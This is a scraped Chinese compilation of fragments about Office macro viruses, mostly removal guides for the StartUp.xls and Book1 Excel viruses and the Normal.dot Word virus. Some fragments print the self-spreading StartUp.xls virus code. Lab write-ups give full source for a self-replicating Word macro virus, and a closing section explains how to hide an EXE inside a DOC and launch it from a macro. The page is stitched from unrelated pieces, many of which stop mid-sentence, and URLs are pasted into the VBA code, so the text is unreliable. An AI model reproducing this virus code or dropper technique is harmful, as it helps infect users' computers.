word文档感染宏病毒解决处理办法

最近word文档感染宏病毒解决处理办法：

一、首先要清除掉word模版，Word模板路径在哪里呢？

1、在Windows XP系统中，“我的模板”所在文件夹目录为C:\Documents and

Settings\Administrator\Application Data\Microsoft\Templates；

2、而在Windows Vista或Windows7\windows10系统中，“我的模板”文件夹目录为

Users\Administrator\AppData\Roaming\Microsoft\Templates。

3、特别注意：word2003模版文件名是：normal.dot ， word2007\2010\2016等

的模版文件名是：normal.dotm

4、如果以上目录找不到可能是你电脑隐藏了目录，请在此设置处打开

二、其次是将电脑系统中360杀毒升级到最新版，再进行全盘杀毒。亲们不要

用金山毒霸杀毒，这个软件不大管用。

宏病毒原理及防范

宏病毒原理及防范 一、常见宏病毒 1．startup宏病毒 宏病毒其实并不神秘，其工作原理是借用宏表4.0的auto_open事件启动病毒代码的复制和病毒文件的新建，新建的文件常放在xlsrt文件夹下。然后利用xlstart文件夹文件可以自动启动的原理把病毒代码复制到新打开的excel文件中。下面先看看startup宏病毒代码吧，注意红字部分。 Sub auto_open() On Error Resume Next If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then Application.ScreenUpdating = False ThisWorkbook.Sheets("StartUp").Copy ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") n$ = https://www.360docs.net/doc/631681765.html, ActiveWindow.Visible = False Workbooks("StartUp.xls").Save Workbooks(n$).Close (False) End If Application.OnSheetActivate = "StartUp.xls!cop" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnKey "%{F8}", "StartUp.xls!escape" End Sub Sub cop() On Error Resume Next If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then Application.ScreenUpdating = False n$ = https://www.360docs.net/doc/631681765.html, Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1) Sheets(n$).Select End If End Sub 2．book1病毒 book1病毒最明显的标志是打开excel时自动跳出一个book1空文件。这种病毒和startup病毒工作原理相似，但启动方式不太一样，该病毒会在excel文件中添加和复制一个宏表，利用宏表4。0程序的auto_open事件启动宏表中的宏代码，进行代码复制，病毒文件创建。打开中了book1病毒文件，在插入-名称里会出现很多陌生的定义名称，这些都是病毒启动名称。 二、病毒专杀 1．手工专杀 strartup.xls病毒。首先把宏的安全性设置为最高级，禁止所有宏运行。然后在电脑中搜索xlstart文件夹，找到后把该文件夹中的strartup.xls文件

清除宏病毒

清除宏病毒，名字是：StartUp.xls方法 --大白菜 文中图片都很小，看不清楚，可以用以下快捷方式：按住ctrl 向上滚动鼠标滑轮可以放大word，就可以看清楚图片了 病毒样本如下：（下面是宏病毒代码，电脑知识欠缺的，千万被乱动哦，小心弄巧成拙） Vba代码 =================宏病毒代码复制从下一行开始================= Sub auto_open() On Error Resume Next If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then Application.ScreenUpdating = False ThisWorkbook.Sheets("StartUp").Copy ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") n$ = https://www.360docs.net/doc/631681765.html, ActiveWindow.Visible = False Workbooks("StartUp.xls").Save Workbooks(n$).Close (False) End If Application.OnSheetActivate = "StartUp.xls!cop" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnKey "%{F8}", "StartUp.xls!escape" End Sub Sub cop() On Error Resume Next If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then Application.ScreenUpdating = False n$ = https://www.360docs.net/doc/631681765.html,

OFFICE宏病毒彻底清除方法

办公室OFFICE宏病毒彻底清除方法最近办公室OFFICE宏病毒泛滥了，整个文件服务器上到处都是宏病毒，搞的办公室大家的电脑上都中了宏病毒，很是苦恼。相信有很多同仁也深有同感！ 前期，杀毒软件360安全卫士、360杀毒、金山毒霸、宏病毒专杀都试了，百般无奈，自己查询了些资料，想出来一条好办法。 治病还是找根源，office宏病毒依赖于VBA插件，VBA百科：Visual Basic forApplications （VBA）是一种Visual Basic的一种宏语言，主要能用来扩展Windows 的应用程式功能，特别是Microsoft Office 软件。也可说是一种应用程式视觉化的Basic Scrip t 1994年发行的Excel 5.0版本中，即具备了VBA的宏功能。 所以我们在OFFCIE2OO安装文件中去掉VBA插件支持即可。 具体操作方法： 1 .打开开始——设置——控制面板，找到添加和删除程序，双击打开。 2.在添加和删除程序界面里，选择更改和删除程序，在程序目录中找到Microsoft office Professional Edition 2003 ,点击更改。 3?在弹出的OFFICE安装界面里，选择添加和删除功能，点击下一步。 4. 在复选框选择应用程序的高级自定义前面打勾。点击下一步。 5. 找到OFFICE共享功能。点+号展开详细子项。找到Visual Basic forApplications，点击前面▼，选择 X 不安装即可。 6. 点击更新，等待OFFICE S新完成，提示Microsoft office 2003已被成功的更新。点击确定就OK了。

令人心烦的excel宏病毒终于清除了-推荐下载

令人心烦的excel宏病毒终于清除了!我如释重负地吁了口气，脑子一下子轻松了许多。你可能不知道，为了清除这个excel宏病毒，几天来，搞得我头昏脑胀。 大约两三个星期前，同事罗某告诉我，下面报上来的excel表，打开后出现了奇怪的现象：会自动打开一个book1的电子表格。他让我帮忙解决一下。我初步判断是宏病毒，默认打开的book1可能是excel的模板。我先“另存为”文件，找到book1的位置，删掉。同时把excel的宏安全性设置为高，禁止运行来历不明的宏，问题即解决了。 恰巧到下面去检查工作，某单位反映，电脑中病毒了，所以没有及时交表格。一问情况，与罗某讲的情况一样。我主动表示去“搞搞看”。但是情况并非如我猜想的那样。情况是：如果将宏的安全性设为非常高，禁用宏，会弹出一个警告：“出现了一个不能被禁止、又无法签署的Microsoft Excel 4.0 宏”，该表打不开；如果要打开这个表，必须降低excel宏安全性等级，将它设为中或低，即运行宏病毒，但又多出了一个book1表。即使将book1删除，仍然不行。面对这个新病毒，当时我不知该怎么办。 没过两天，罗某又来找我，说又出现了一种现象。我去看了，正与上次在下面检查时看到了excel 4.0 宏病毒一模一样。而且，下面有几个单位都说出现了宏病毒，上报来的表格中都有上面讲的问题。而且办公室有三台电脑都感染了excel 4.0 宏病毒。这么多的电脑感染了，引起了我的兴趣。

以前，我的电脑也多次中过病毒。我一般的做法就是上网查找 资料，把几篇文章介绍的方法结合起来，多试几次，几乎都能解决。可是这一次，情况完全不同。上网查了多次，讲宏病毒的文章特别多，但是介绍杀除方法的极少，而专门针对Microsoft Excel 4.0 宏病毒的只有一两篇提问的贴子，所介绍的方法就两样，一是在Excel 2003中禁止宏，二是用杀毒软件。第一种禁止是不行的，第二种杀毒软件我用了小红伞、360安全卫士，没查出病毒。 除此之外，还有一种临时救急的方法是：打开病毒表格，复制，再新建一个表格，选择性粘贴，只选值，最后保存。这个办法虽然行，但是面对那么多有宏病毒的表格，一个一个打开、复制、选择 性粘贴是不现实的。怎么办呢？ 接下来，我的思路是选择一种不支持excel宏的电子表格软件，这 样也许就把宏病毒过滤了。我试验过的软件有：wps office 2003 到最新的2010版，Ashampoo Office 2010，OpenOffice 3.2，永中Office 2009。它们都提示发现了宏，有的说不支持，有的说可以禁用，重新保存后宏病毒仍然存在，要么再打开时软件死机。 但是试验中发现微软Office 2007 / 2010 Beta 可以打开表格，只是在菜单栏提示“禁止了宏”，不影响操作。然而，现在基层单 位的电脑配置都比较低，安装不了Office 2007 / 2010 Beta，再说Office 2007 / 2010 Beta的菜单怪怪的，很多人不习惯。最重要的是，这并没有从根本上解决问题，宏病毒依然在表格文件里。 有个单位的人对我说，他们请来了电脑公司人员，几个小青年，把

Word宏病毒

Word宏病毒 1.实验目的(后果自负) Word宏是指能组织到一起为独立命令使用的一系列Word指令，它能使日常工作变得容易。本实验演示了宏的编写，通过两个简单的宏病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。 2.实验所需条件和环境 硬件设备：局域网，终端PC机。 系统软件：Windows系列操作系统 支撑软件：Word 2003 软件设置：关闭杀毒软；打开Word 2003，在工具→宏→安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic项目的访问 实验环境配置如下图所示： 受感染终端 受感染 Word文档 被感染终端宏病毒传播示意图 3.实验内容和分析 为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过

多的word文档，否则清除比较麻烦（对每个打开过的文档都要清除）。 3.1. 例1 自我复制，感染word公用模板和当前文档 代码如下： 'Micro-Virus Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.SaveNormalPrompt = False Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If With Host If .Lines(1.1) <> "'Micro-Virus" Then .DeleteLines 1, .CountOfLines .InsertLines 1, Ourcode .ReplaceLine 2, "Sub Document_Close()" If ThisDocument = nomaltemplate Then .ReplaceLine 2, "Sub Document_Open()" ActiveDocument.SaveAs ActiveDocument.FullName End If End If End With MsgBox "MicroVirus by Content Security Lab" End Sub 打开一个word文档，然后按Alt+F11调用宏编写窗口（工具→宏→Visual Basic→宏编辑器）,在左侧的project—>Microsoft Word对象→ThisDocument中输入以上代码，保存，此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。 3.1.1.代码解释 以上代码的基本执行流程如下： 1)进行必要的自我保护 Application.DisplayStatusBar = False Options.SaveNormalPrompt = False 高明的病毒编写者其自我保护将做得非常好，可以使word的一些工具栏失效，例如将

宏病毒分析及清除实验

实验五宏病毒分析及清除实验 姓名：xxx 学号：xxxxxxxx 日期：2014年4月26日 专业：计算机科学与技术 一、实验目的 ?了解“宏病毒”机理； ?掌握清除宏病毒的方法； ?掌握采用“宏”和脚本语言进行编程的技术。 二、实验环境 ?Windows2003操作系统； ?Office Word2003字处理软件。 三、实验内容 1．软件设置 关闭杀毒软件；打开Word字处理软件，在工具“宏”的“安全性”中，将“安全级”设置为低，在“可靠发行商”选项卡中，选择信任任何所有安装的加载项和模板，选择“信任visual basic项目的访问”。 注意：为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的word文档，否则清除比较麻烦（对每个打开过的文档都要清除）。 2．自我复制功能演示 打开一个word文档，然后按Alt+F11调用宏编写窗口（工具“宏”“Visual Basic宏编辑器”）,在左侧的“project—>Microsoft Word”对象“ThisDocument”中输入以下代码（Macro-1），保存，此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。 完整代码如下：

EXCEL宏病毒处理方法

Excel宏病毒（BOOK1病毒）处理方法 症状：第一次打开带病毒的EXCEL文档时，会提示“是否启用宏”对话框，以后每次打开EXCEL 文档时就会自动弹出一个Book1文档。 传播途径：主要以发送邮件或使用U盘时，接收了带病毒的EXCEL 文档。 处理步骤： 1、首先进行病毒查杀：使用360杀毒软件或瑞星杀毒软件查杀； 2然后将病毒源进删除： 在C:\Program Files\Microsoft Office\OFFICE11\xlstart\下，然后将book1文件删除。 查毒方式： 主要有360杀毒软件和瑞星杀毒软件两种，这里详细介绍瑞星杀毒软件的安装和使用方法。 StartUp.xls宏病毒清除方法及步骤 StartUp.xls宏病毒的现象： 1.打开excel文件时提示有宏 2.文件不能直接保存，只能另存 3.打开excel文件时，点击"窗口"->"取消隐藏"，会打开一个Startup.xls 文件

StartUp.xls宏病毒清除方法及步骤：（excel宏病毒） 第一步：清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART下的StartUp.xls； （注意：其中有些事隐藏文件，你看不到，按照下面说的做就可以看到那些隐藏文件：打开我的电脑》》工具》》文件夹选项》》“隐藏受保护的操作系统文件（推荐）”前面的勾打掉》》选中“显示隐藏的文件、文件夹和驱动器”》》去掉“隐藏已知文件类型的扩展名”的勾。） 第二步：清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\的Excel11.exe(约236K)及Excel11.xlb等名字中带有Excel11的文件。（删除后Excel程序会自动创建部分文件） 第三步：下载startup.xls并放入“C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART\”。 注：各大杀毒软件多数不能发现此病毒，仅有少数几款，如nod32可以发现，但清除时会直接删除文件，因此在发现此类病毒时，使用上述方法解决，或联系信息中心协助处理。

一个简单宏病毒的感染与清楚

宏病毒实验 1. 实验目的 （1）理解宏病毒的概念、病毒机制、传播手段以及预防措施。 （2）观察一个简单宏病毒感染计算机后的现象，并寻找清除病毒的方法。 2. 实验原理 宏（Macro）是微软公司出品的Office软件包中所包含的一项特殊功能。微软公司设计此项功能的主要目的是给用户自动执行一些重复性的工作提供方便。它利用简单的语法，把常用的动作写成宏，用户工作时就可以直接利用事先编写好的宏自动运行，以完成某项特定的任务，而不必反复重复相同的工作。微软的Word Visual Basic for Application(VBA)是宏语言的标准。宏病毒正是利用Word VBA 编写的一些宏，是一种寄存在文档或模板中的计算机病毒。一旦打开含有宏病毒的文档，其中的宏就会执行，宏病毒被激活，转移到计算机中并驻留在Normal 模板上。以后所有自动保存的文档都会感染上这种宏病毒。 预防宏病毒有以下几种基本的方法： （1）防止执行自动宏：可以通过在DOS提示符下输入指令”WinWord.exe /m DisableAutoMacro”来防止打开Word文档时执行自动宏。另外，在打开或关闭文档时按下Shift键可以使文档不执行任何自动宏。 （2）保护Normal模板：可以采取以下几种方法对Normal模板进行保护。提示保存Normal模板；设置Normal模板的只读属性；设置密码保护；设置安全级别；按照自己的习惯设置Normal模板并进行备份，当被病毒感染时，使用备份模板覆盖当前模板。 （3）使用DisableAutoMacro功能。 3. 实验环境 虚拟机下Windows server 2003 4. 实验内容 本实验拟在虚拟机下感染一个简单的宏病毒，然后观察病毒对计算机有什么影响，最后寻求清除方法。

怎样查杀Excel宏病毒

怎样查杀Excel宏病毒“Starup”、“results” 最近1个月发现，我公司的办公电脑80%以上中招感染了Starup、results 病毒（Excel 宏病毒） 大家检查自己是否中毒的方法1：进入你的\Excel\XLSTART文件夹，看看是否有result 等excel工作簿，如果有，那么恭喜你，中毒了！ 大家检查自己是否中毒的方法2：打开你最近经常编辑Excel文档，按Alt+F11 进入VB 编辑器大家会发现“模块”-“StartUP”，这说明你的电脑已经感染了病毒，如下图： 大家检查自己是否中毒的方法3：存盘是出现以下提示： 手动删除病毒方法一： 1、关闭Office，删除Excel的启动加载文件夹startup文件夹中的所有文件和文件夹，建立result.xls文件夹、建立result.xlsx文件夹、建立startup.xls文件夹、建立startup.xlsx 文件夹（找到XLSTART文件夹位置的方法：搜索关键字“XLSTART”文件夹。例如win7 中的位置： C:\Users\Administrator\AppData\Roaming\Microsoft\Excel\XLSTART;XP中的位置C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART下） 2、按alt+F11 进入VB编辑器然后在左上角的方框里面找到startup然后右键选择移除模块导出选择否手动清除就OK ，最后按alt+Q退出保存关闭EXCEL 再打开就好了只是清除了病毒其他的宏可以用。 【大家也可参考百度指导方案：https://www.360docs.net/doc/631681765.html,/question/408814883.html】使用专杀工具删除、防治病毒方法二： 宏病毒专杀|免疫（CleanMacro),经过本人验证，杀毒确实有效，预防有时不灵（本人64位win7） 推荐使用！ 下载介绍页面：https://www.360docs.net/doc/631681765.html,/thread-22450603-1-1.html

office宏病毒的解决方法

最近公司内宏病毒泛滥，尤其是WORD、EXCEL文件中的宏病毒在公司办公电脑上互相感染，影响了办公效率，给我们的日常办公造成了困扰。 经过测试，现在找到了一个比较有效的远离宏病毒的方法，即“删除OFFICE中的VBA”，操作步骤如下： 1、点开始—>控制面板－>打开“添加删除程序“并找到“Microsoft office professional Edition2003” 2、单击按钮，出现OFFICE安装界面。

3、选择“添加或删除功能”，然后单击“下一步”。 4、在“选择应用程序的高级自定义”前打上勾，并单击“下一步”。

5、选择office共享功能下的“Visual Basic for Applications”项，下拉它前面的三角，选择“不安装”。此时它的前面就变成了一个红叉号，然后单击“更新”按钮。 7、显示出“Microsoft office 2003已被成功地更新”，单击“确定”

8、提示“重新启动计算机后，生效……”，单击按钮“是”,重新启动计算机，Office中的VBA已删除。 9、分别打开WORD、EXCEL，选择菜单栏中的“工具”-->宏-->安全性 选择安全级为“非常高”。

可靠发行商下面的“信任所有安装的加载项和模板”、“信任对于Visual Basic 项目的访问”这两项都不要选中。 （备注:第9项有的电脑不需要设置。） 删除了VBA后新建的文件，不会含有宏病毒了，但是原来的文件中有可能含有宏病毒。原文件的除毒方法： 1、打开文件时，如果提示“此工作簿已丢失了其VBA项目……”并且文件的标题上方显示着“只读” 2、点文件“另存为”

StartUp.xls宏病毒清除方法及步骤

StartUp.xls宏病毒清除方法及步骤 StartUp.xls宏病毒的现象： 1.打开excel文件时提示有宏 2.文件不能直接保存，只能另存 3.打开excel文件时，点击"窗口"->"取消隐藏"，会打开一个Startup.xls文件 StartUp.xls宏病毒清除方法及步骤：（excel宏病毒） 第一步：清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART下的StartUp.xls； （注意：其中有些事隐藏文件，你看不到，按照下面说的做就可以看到那些隐藏文件：打开我的电脑》》工具》》文件夹选项》》“隐藏受保护的操作系统文件（推荐）”前面的勾打掉》》选中“显示隐藏的文件、文件夹和驱动器”》》去掉“隐藏已知文件类型的扩展名”的勾。）第二步：清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\的Excel11.exe(约236K)及Excel11.xlb等名字中带有Excel11的文件。（删除后Excel程序会自动创建部分文件） 第三步：下载startup.xls并放入“C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART\”。 注：各大杀毒软件多数不能发现此病毒，仅有少数几款，如nod32可以发现，但清除时会直接删除文件，因此在发现此类病毒时，使用上述方法解决，或联系信息中心协助处理。

清除宏病毒方法

清除宏病毒方法 一、验证是否感染了宏病毒？ 打开需要检查的文档，单击“文件”菜单栏，选择“另存为”命令，如果对话框中的保存类型固定为“文档模板”，则表示这个文件已经感染了宏病毒。 二、清除宏病毒的方法 1、 OFFICE2003方法：打开文档，工具――宏――宏（或者使用组合键“Alt ＋F8”,如OFFICE版本不同找不到选项，可以使用此组合键）调出宏对话框，如果在弹出的对话框中有已经记录的宏的话，那就极有可能是宏病毒，删除所有的宏就可以了。

比较复杂的宏病毒会将宏对话框屏蔽掉，这时就需要采用其他方法了。Word 环境中的宏病毒一般是存放在Microsoft Office目录下Templates子目录中的Normal.dot文件中，这时需要重新启动计算机，找到这个文件，并把它删除，再运行Word就可以了。但是有些宏病毒“知道”用户会找到No rmal.dot 并删除掉，所以它会在硬盘的多个目录中放上同样的No rmal.dot，如果只删除Templates下的一个，Word会按照Windows缺省的搜索路径进行搜索，这样会加载其他有毒的Normal.dot，并把删除掉的再重新恢复这时，只要使用Windows中查找文件的方法把硬盘中所有的Normal.dot全部删除就可以了。 2、设置宏安全性。Office2003方法，打开文档－工具－选项－安全性－宏 安全性－安全级。 Office20010方法，打开文档－文件－选项－信任中心－信任中心设置－宏设置－禁用所有宏，并且不通知。

3、使用宏病毒专杀工具全盘查杀。 可到https://www.360docs.net/doc/631681765.html,/html/5254.html下载专杀工具。 安装“宏病毒专杀工具”，按照步骤一步步安装即可，安装完成后，进行全盘扫描查杀。

手动删除EXCEL宏病毒方法

通常EXCEL只有启用了宏后，EXCEL宏病毒才会被感染，因此我们在EXCEL宏设置中，将其设置为“禁用宏，并发出通知”就可以了。但如何删除感染病毒EXCEL 表中的宏病毒程序，就是我们下面要介绍的。 一、移除EXCEL表中宏病毒代码的模块 在Excel界面点Alt+F11，进入VBE窗口，会在左边“工程”窗口中看到一个模块，点右键将其移除。 二、删除EXCEL表中宏病毒代码 虽然EXCEL表中宏病毒代码的模块已移除，但“工程”窗口中双 击”ThisWorkbook”后，发现依然有宏病毒代码。 将这些代码清除掉，并保存关闭退出EXCEL表。 三、让隐含的4.0宏表函数现身 当完成前面两个步骤时，原本以为宏病毒会彻底删除，但当再次打开该EXCEL 表格时依然会提示你该表中存在宏。这是因为该EXCEL表中还含有隐藏的病毒工作表macro1，工作簿中有隐含的4.0宏表函数，隐含在隐藏的名称中。下面介绍如何让其现身： 1.在Excel界面点Alt+F11，进入VBE窗口，在左边“工程”窗口中右键ThisWorkbook，然后插入一个模块： 2.将如下代码复制到模块中： Sub DisplayNames() Sheets(1).Visible = xlSheetVisible Dim Na As Name For Each Na In https://www.360docs.net/doc/631681765.html,s Na.Visible = True

Next End Sub 说明： （1）“Sheets(1).Visible = xlSheetVisible”代码表示将隐藏的病毒工作表macro1显示出来。 （2）剩下的一段代码表示将包含宏表函数的名称显示出来 然后点“运行”按钮运行宏代码，如下图： 3.这时会看到病毒工作表macro1（左图）及包含宏表函数的名称（右图：在公式—名称管理器中查看）显示出来了，如下： 4.点选这个名称，然后选择删除；同是将病毒工作表macro1删除。 5. 别忘了，将自己在“工程”窗口中插入的模块点右键移除。 以上操作完成后，保存关闭EXCEL表格，下次再打开就再也不会提示存在宏了。 说明：以上操作及截图是在EXCEL2010下的，EXCEL2003的原理及方法是一样的，只是在执行第三步第3点调出名称管理器时的位置不一样。在（插入→名称→定义）中。

BOOK1宏病毒手工处理方法

BOOK1宏病毒手工处理方法 如果你打开XLS文件，同时会产生一个BOOK1的工作薄，那么，可以确定，你的office2003中了BOOK1宏病毒。该病毒看似无恶意，但是烦人，之后使用过的XLS文件都将被感染。虽然该毒不是新毒，但目前各杀毒软件都不识别。 以下为处理方法： 1、如果你的office2003装在C盘，则双击“防止感染C.bat”，office 装在D盘，则双击“防止感染D.bat”（说明：该操作可在X:\Program Files\Microsoft Office\OFFICE11\XLSTART下生成BOOK1特殊文件（普通方法无法删除），防止该病毒建立book1病毒文件，如果\XLSTART 存在book1（155KB）在启动EXCEL时，就会同时打开该文件，所以感染你打开的XLS文件。） 2、安装“BOOK1宏病毒超专杀.exe”（该软件必须关闭你所装的杀毒软件方可运行。），并对你的XLS文件进行扫描清除宏毒。该软件不理想的是，打开已扫描（已清除）宏病毒的XLS，始终会有禁止宏的提示。按3可以去除。 3、打开已扫描（已清除）宏病毒的XLS，提示点“确定”。点菜单插入，名称，定义，出现“定义名称”对话框，按住ALT+D，用鼠标点列表中的各项（即依次删除各项），最后，保存XLS。再打开就正常了。 通过以上3步，即可彻底搞定该BOOK1病毒。

如果2中，“BOOK1宏病毒超专杀”无法运行，请人工清除该病毒。一定先执行1。然后，打开带宏毒的XLS文件，并启用宏。点菜单格式，工作表，取消隐藏。确定。此时，会出现“00000ppy”工作表，点菜单工具，保护，撤消工作表保护，密码为“VicodinES”。然后，对着“00000ppy”表标签右击，删除。再执行3。到此手工清除结束。

宏病毒深入分析

宏病毒的深入分析 OFFICE给用户提供了用于创建专业而优雅的文档,表格等工具，帮助用户节省时间，并得到优雅美观的结果，在当前使用中是占有巨大优势的文字，数据处理器。它为我们的办公提供了极大的便利.OFFICE为了方便客户，提供了宏这样一个功能。宏就是能组织到一起作为一独立的命令使用的一系列命令，它能使日常工作变得更容易，一般说来，宏是一种规则或模式，或称语法替换，用于说明某一特定输入（通常是字符串）如何根据预定义的规则转换成对应的输出（通常也是字符串)。这种替换在预编译时进行，称作宏展开。通俗的来说，客户事先设置好宏，需要时就可以批量使用，而不必重复操作。然而宏也是一把双刃剑，它在让客户享受便利的同时，同时也为黑客留下了漏洞，这就是今天要分析的宏病毒。 宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。word宏病毒通过．DOC文档及．DOT模板进行自我复制及传播，而计算机文档是交流最广的文件类型。多年来，人们大多重视保护自己 计算机的引导部分和可执行文件不被病毒感染，而对外来的文档文件基本是直接浏览使用，这给Word 宏病毒传播带来很多便利。特别是Intemet网络的普及．Email的大量应用更为Word 宏病毒传播铺平道路。根据国外保守的统计，宏病毒的感染率高达40％以上，即在现实生活中每发现100个病毒，其中就40多个宏病毒，而目前国际上普通病毒种类已达12000多种。 宏病毒的产生，是利用了一些数据处理系统内置宏命令编程语言的特性而形成的。这些数据处理系统内置宏编程语言的存在使得宏病毒有机可乘，病毒可以把特定的宏命令代码附加在指定文件上，通过文件的打开或关闭来获取控制权，实现宏命令在不同文件之间的共享和传递，从而在未经使用者许可的情况下获取控制权，达到传染目的。目前在可被宏病毒感染的文件中，以W0rd，Excel居多。Word宏病毒与Excel宏病毒的特性较为相似，因此以word宏病毒为例，说明宏病毒的作用，传染以及发作的机理和特性。一旦病毒宏侵入woId，它就会替代原有的正常的宏，如FileOpen、FileSave等，并通过这些宏所关联的文件操作功能获取对文件交换的控制。当某项功能被调用时，相应的病毒宏就会篡夺控制权，实施病毒所定义的非法操作，包括传染操作、表现操作以及破坏操作等。宏病毒在感染一个文档时，首先要把文档转换成模板格式，然后把所有病毒宏f 包括自动宏)复制到该文档中。被转换成模板格式后的染毒文件无法转存为任何其他格式。含有自动宏的宏病毒染毒文档，当被其他计算机的woId系统打开时，便会自动感染该计算机。例如，如果病毒捕获并修改了FileOpen．那么，它将感染每一个被打开的Word文件。目前，几乎所有已知的宏病毒都沿用了相同的作用机理，即如果Word 系统在读取一个染毒文件时遭受感染．则其后所有新创建的DOC文件都会被感染。 以往病毒是以二进制的计算机机器码形式出现，而宏病毒则是以人们容易阅读的源代码宏言word Basic形式出现，所以编写和修改宏病毒比以往病毒更容易。目前，世界上的宏病毒原型己有几十种，其变种与日俱增．追究其原因还是Word

完美解决excel VBA宏病毒

打开EXCEL文档，提示EXCEL VBA中包含无法禁用的宏（excel4.0的），禁用宏则文档为空什么都不显示；发邮件提示有病毒文件发送不成功；在打开EXCEL文件时，自动新建无数个EXCEL文件。如有上述情况，可能中了VBA宏病毒，请用下列方式进行处理： 1、格式-工作表—取消隐藏，会多出来一个“00000PPY”的工作表，请把该隐藏的工 作表删除。 如取消隐藏为灰色，则文件没中该病毒 EXCEL 2007操作方法为：选中某一工作表后右键—取消隐藏 2、插入-名称-定义，把所有的多余的名称定义删除。 EXCEL 2007操作方法为：公式—名称管理器 此时该文件的病毒已删除。但如果新建EXCEL文件，则还会中该病毒，请执行第三步。 3、打开ProgramFiles\MicrosoftOffice\OFFICE11\XLSTART下的book1文件，执行1、2 步。 （BOOK1文件为无扩展名，请用右键-打开方式-选择EXCEL打开） 4、找到ProgramFiles\MicrosoftOffice\OFFICE11\XLSTART下的book1文件，右键—属性 —-只读打勾—确定。 由于EXCEL每次启动时自动打开 ProgramFiles\MicrosoftOffice\OFFICE11\XLSTART下的book1文件，经过第3、4 步处理后，不会在本机上再传播此病毒，但已感染的文件必须逐一进行第1 步和第2步处理。 该病毒目前传播已十分广泛，360 金山瑞星等杀毒软件都查不到毒，卡巴能查到但会把文件一次性删除得不偿失。 由于该病毒在EXCEL文件中存在，除非把EXCEL文件全部删除否则重装系统不能解决该问题。 该病毒不会在EXCEL 2007传播，但把文件传给他人仍然会传播该病毒。 该病毒十分讨厌，给工作造成了诸多不便，但有点象恶作剧，对计算机和文件没有实质性破坏。但邮件发不出去，一打开EXCEL文件就新建几百个EXCEL文件，实在是可恶到人受不了，毕竟工作离不开EXCEL。

宏病毒制作参考

-- Word宏病毒制作，传播，防范 EXE变DOC的方法 其实这种转换并不是文件格式上的变化,只不过是把一个exe文件接在一个doc文件的末尾而已,这个doc 文件当然就不是不同word的文档啦,该文档中包含了宏语句,能在 运行的时候把接在自己文件末尾的exe文件数据读取出来并运行,就 造成一种假象,好象文档打开时就运行了exe文件似的.(和文件捆绑器的原理很象啊!) 熟悉vb的朋友都知道,word的宏是使用vba来编写的,具体语法和vb一样,但有些方法vb中没有,如宏病毒 就是利用宏复制语句来达到感染的目的.和vb一样,我们可以在编写宏的时候调用windows api!!下面我们来介绍一下我们编写这个宏需要用到的api函数: 1)createfile 用于打开文件,该函数vb的声明如下: declare function createfile lib "kernel32" alias "createfilea" (byval lpfilename as string, byval dwdesiredaccess as long, byval dwsharemode as long, byval lpsecurityattributes as long, byval dwcreationdistribution as long, byval dwflagsandattributes as long, byval htemplate as long) as long

2)closehandle 用于关闭被打开文件的句柄,该函数vb的声明如下: declare function closehandle lib "kernel32" (byval hobject as long) as long 3)readfile 用于从被打开文件中读取数据,该函数vb的声明如下: declare function readfile lib "kernel32" (byval hfile as long, lpbuffer as byte, byval dwnumberofbytestoread as long, lpnumberofbytesread as long, byval lpoverlapped as long) as long 4)writefile 用于把读取出的数据写入文件,该函数vb的声明如下: declare function writefile lib "kernel32" (byval hfile as long, lpbuffer as byte, byval dwnumberofbytestowrite as long, lpnumberofbyteswritten as long, byval lpoverlapped as long) as long 5)setfileponiter移动文件指针,该函数vb的声明如下: declare function setfilepointer lib "kernel32" (byval hfile as long, byval ldistancetomove as long, byval lpdistancetomovehigh as long, byval dwmovemethod as long) as long 6)下面是以上函数的参数声明 public const generic_read as long = &h80000000 public const generic_write as long = &h40000000 public const file_share_read as long = 1 public const file_share_write as long = 2 public const create_new as long = 1

excel宏病毒解决方法

